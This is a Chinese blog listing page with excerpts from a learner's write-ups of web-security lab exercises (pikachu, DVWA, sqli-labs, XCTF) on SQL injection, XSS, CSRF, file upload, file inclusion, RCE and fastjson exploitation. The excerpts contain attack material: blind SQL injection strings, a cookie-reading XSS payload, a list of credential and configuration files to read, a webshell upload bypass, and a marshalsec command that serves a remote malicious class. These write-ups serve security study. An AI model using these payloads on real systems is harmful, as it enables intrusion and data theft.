- 博客(25)
- 收藏
- 关注
RSS订阅原创 pikachu--xxe
发现这里采用post方式传输数据,且没对xml参数进行过滤,simplexml_load_string()函数将用户传入的xml直接转换为SimpleXMLElement对象,故这里存在被篡改参数内容,造成xxe的漏洞。现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。以PHP为例,在PHP里面解析xml用的是libxml,其在≥2.9.0的版本中,默认是禁止解析xml外部实体内容的。写一个正经的xml。
2023-07-12 10:46:46
196
原创 目录遍历及敏感信息泄露
”这样的手段让后台打开或者执行一些其他的文件。看到这里,你可能会觉得目录遍历漏洞和不安全的文件下载,甚至文件包含漏洞有差不多的意思,是的,目录遍历漏洞形成的最主要的原因跟这两者一样,都是在功能设计中将要操作的文件使用变量的 方式传递给了后台,而又没有进行严格的安全考虑而造成的,只是出现的位置所展现的现象不一样,因此,这里还是单独拿出来定义一下。敏感信息泄露虽然一直被评为危害比较低的漏洞,但这些敏感信息往往给攻击着实施进一步的攻击提供很大的帮助,甚至“离谱”的敏感信息泄露也会直接造成严重的损失。
2023-06-26 18:29:50
335
原创 逻辑漏洞-水平/垂直越权-pikachu
成因:后台使用了不合理的权限校验规则导致的。越权漏洞容易出现的场景:一般在权限页面(需要登录的页面)增、删、改、查的的地方分类:水平越权、垂直越权一:水平越权:同级别用户访问别人的资源。登录,用户名:lucy,密码:123456登录,用户名:lili,密码:123456对比两者的登录链接,发现只有username不同,故将lili的值改成kobe,回车,发现登陆了kobe的账号。二:垂直越权:低级别权限的用户访问高级别用户的资源。登录pikachu密码:00000
2023-06-25 20:49:47
422
原创 pikachu-文件上传
抓包修改为image/jpeg,成功绕过。试试,直接在在浏览器禁用js,然后直接上传1.php,发现上传成功。可能时检测文件头部信息,加上图片头部信息试试,如gif头部GIF89a?上传1.php并抓包。Content-Type改为image/jpeg,发包试试,不行。上传一个图片1.jpg并抓包,修改图片名为一句话木马1.php,发包,上传成功。看回显说后缀名为空,想必后缀名可能必须时jpg之类的,考虑一下%00.jpg试试。这里直接上传php文件BP抓不到包,由此也能猜想到时前端验证文件后缀。
2023-05-20 19:02:22
419
原创 pikachu-文件下载
附上链接:https://cloud.tencent.com/developer/article/1957953。/etc/passwd /etc/shadow /etc/my.cnf //mysqL配置文件。/etc/httpd/ conf/httpd. conf //apache配置文件。/root/.ssh/known_ hosts //记录每个访问计算机用户的公钥。/var/lib/mlocate/mlocate.db //全文件路径。/porc/config.gz //内核配置文件。
2023-05-20 00:40:13
115
原创 pikachu-文件包含漏洞
本地文件包含漏洞:仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击着更多的会包含一些固定的系统配置文件,从而读取系统敏感信息。1、php的配置文件php.ini中的allow_url_include()=on,allow_url_fopen=on。C:/Windows/System32/inetsrv/MetaBase.xml//IIS 配置文件。C:/Program Files/mysql/my.ini//Mysql 配置。抓包修改,读取1.php试试。
2023-05-19 22:30:00
351
原创 pikachu-RCE
远程命令执行:应用系统从设计上需要给用户提供指定的远程命令操作的接口比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。例 echo whoami。&(后台任务符):两条语句都执行,如果前面的语句为假则执行后面的语句,如果前面的语句为真则不执行后面的语句。&:两条语句都执行,如果前面的语句为假则执行后面的语句,如果前面的语句为真则不执行后面的语句。
2023-05-15 00:09:06
297
原创 pikachu-SQL注入
发现kobe’ and if((substr(database(),1,1))=‘p’,sleep(5),null)#时,延迟了,就这样慢慢尝试,或者拿bp弄字典跑跑啥的。用load_file()之前务必先看secure_file_priv=“”。看看数据库名的长度:name=kobe’ and length(database())>=7#,这里需要url编码,即:name=kobe’+and+length(database())>%3d7%23&submit=%E6%9F%A5%E8%AF%A2。
2023-05-11 18:06:50
1240
原创 pikachu-csrf
登录vince/123456,点修改个人信息,地址栏看不到url,用bp抓包,直接在url中修改Vince的信息,将修改过的url:xxxxxxxx/pikachu/vul/csrf/csrfget/csrf_get_edit.php?攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。CSRF与XSS的区别:CSRF是借用户的权限完成攻击,攻击者并没有拿到用户的权限,而XSS是直接盗取到了用户的权限,然后实施破坏。三、CSRF(TOKEN)
2023-04-25 21:45:10
113
原创 结合DVWA-Brute Force(暴力破解)
Brute Force(暴力破解):指的是黑客利用密码字典,使用穷举法猜解出用户的口令。一、Low:看下核心源码:这里对username、password都未进行过滤,isset()函数只是检查参数是否被设置,返回True或者False。且后面将username、password这两个参数带入数据库查询,故存在SQL注入的漏洞。故有两种方法:(1)抓包用burp suite爆破;(2)手工SQL注入。1.用burp suite爆破<?phpif( isset( $...
2023-04-11 21:08:42
329
原创 fastjson复现利用
进入target下,启动rmi服务:java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.0.104:8080/#TouchFile" 2222。上传恶意文件到公网,在本机打开命令行,进入存放java文件的目录,javac TouchFile.java编译刚才的java文件,编译完成在当前目录下发现class文件已经存在:TouchFile.class。至此,攻击环境准备好了。.....
2022-08-16 22:31:31
1515
原创 文件包含-xctf-warmup
启动环境,发现只有一个滑稽。也没什么别的信息。f12看下。发现有个source.php。访问下看看。发现一堆代码。审计代码。 ,然后再判断一次 绕过思路:以file作为请求的参数(利用file协议),构造payload,满足:(1)file不为空且在白名单中,或者file参数中的?之前的子字符串在白名单中,也就是说为source.php或者hint.php。(2)知道ffffllllaaaagggg的路径,或者用“../”进行目录穿越。
2022-07-10 22:43:52
769
原创 堆叠注入-supersqli-XCTF
启动靶机:只有个框,试试SQL注入,先提交1,有回显。 提交1 and 1=1和1 and 1=2,发现没反应。输入1',发现报错,有注入。 试试1' and '1'='1和1' and '1'='2,输入1' and '1'='2发现页面和1' and '1'='1不同。判断为单引号字符型注入。 输入1' order by 1#和1' order by 2#,回显正常。输入1' order by 3#,报错,故字段只有2个。 按照正常的逻辑,接下来
2022-07-09 16:34:38
170
原创 反序列化——pikachu
序列化:为了方便传输和存储数据,将要传输或者存储的对象进行序列化生成json对象,传到持久化服务器上。反序列化:从内存中读取序列化后的json对象,将其转换为所需对象。PHP序列化函数:serialize()反序列化函数:unserialize()看下源码:这里使用POST方式接收数据,并使用unserialize()函数对接收到的数据进行反序列化。<?php/** * Created by runner.han * There is nothing new under t
2022-05-17 17:36:26
602
原创 pikachu--ssrf(Server-Side Request Forgery):服务器端请求伪造
PHP中导致ssrf的函数:file_get_contents()、fsockopen()、curl_exec()。一、curl_exec():通过URL语法在命令行下工作的文件传输工具。访问其他地址上的资源。curl支持很多协议,有http、https、ftp、gopher、Telnet、dict、file、ldap。1.原理:服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制。攻击者传入恶意地址,受害人访问恶意地址,导致受到攻......
2022-05-17 16:54:04
603
原创 结合DVWA-CSRF浅析
CSRF:跨站请求伪造。即利用受害者未过期的身份认证信息(cookie、session等),诱导其点击攻击者构造的恶意链接,或者恶意页面,在受害人不知情的情况下,利用(不像XSS那样盗取)受害人有效的身份认证信息,向受害人访问的服务器发送请求,从而完成非法操作,如:改密码、转账等。一.攻击方法:1.直接构造恶意链接。(看上去就像是改密码的,反正我不点)如http://127.0.0.1/DVWA/vulnerabilities/csrf/?password_new=123&passwor
2022-03-12 20:01:52
633
原创 DVWA-文件包含漏洞
文件包含:当服务器开启allow_url_include选项时,可以通过某些特性函数如:include() , require() , include_once() , require_once() 利用url去动态地包含文件,若未对文件进行来源审查,就会导致任意文件读取或者任意命令执行。分类:(1)本地文件包含(2)远程文件包含:因为开启了PHP配置中的allow_url_fopen选项,服务器允许包含一个远程文件。一、low看下服务器端核心代码:page为做任何过滤。
2022-03-05 01:06:02
10198
原创 结合DVWA-存储型XSS
一、低级看下源码:trim()函数过滤掉name和message两边的空格。stripslashes()函数过滤掉“\”。但是未对name做任何过滤。所以考虑在name输入框进行注入。尝试直接js代码注入。结果发现name输入框有长度限制,本人使用的火狐浏览器,f12,发现name长度为10,直接在代码里修改,比如为30。然后再name输入框中进行js代码注入。如:<script>alert(document.cookie)</script><bod
2022-01-10 23:45:49
2947
原创 结合DVWA的反射型XSS浅析
一.概念XSS:跨站脚本攻击。黑客通过HTML注入篡改了网页,在网页中插入恶意脚本。二.分类1.反射型XSS:简单地把用户输入的数据反射给浏览器。2.存储型XSS:将用户输入的数据存储在服务器端。3.DOM型XSS:通过修改页面的DOM节点形成XSS。三.DVWA-XSS实践1.低级看下源码,这里无任何过滤。直接将用户的输入反射给浏览器。故直接构造payload语句:<script>alert(/This is XSS!/)</s...
2022-01-08 22:14:13
2685
原创 文件上传漏洞—%00截断,配合upload-labs-12和Burp Suite
预备知识:在请求方法中,get方式会对url编码进行自动解码,但是post不会对url编码进行自动解码。所以,在数据包以post方式提交时,要先将url编码进行解码,然后再提交。查看下本关的源码。不难发现,本关使用白名单,只允许上传jpg、png、gif格式的文件。源码中move_upload_file将文件上传到img_path的路径中,而img_path路径是save_path加上随机数时间戳+ “.” + 后缀名。这里save_path可以在数据包中修改。...
2021-11-08 19:23:59
2737
原创 sqli_labs:Less-12 简要SQL注入-基于报错的变形双引号字符串注入(配合Burp Suite食用更佳)
1.万能用户名、密码:admin。打开Burp Suite的代理准备抓包。先登录,点Submit。 到Burp Suite看到抓包成功。将数据包发送到Repeater,开始注入。判断列名和字段数的方式与第一关相同,只是在BurpSuite进行。字段数为2。经尝试发现,在提交给数据库查询之前,源代码会自动给用户名和密码加上双引号和括号。判断数据库名和版本号。uname=1admin") union select version(),database() #&pass..
2021-10-15 16:02:41
375
原创 sqli_labs:Less-1 简要SQL注入-基于错误的单引号字符串
一、判断是否存在注入,注入是字符型还是数字型。?id=1,正常?id=1' ,加上“ ' ”后,报错,所以可能存在字符型输入。?id=1%27--+ ,用--+注释掉以后,正常。所以存在单引号字符型注入。...
2021-08-13 17:18:26
528
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人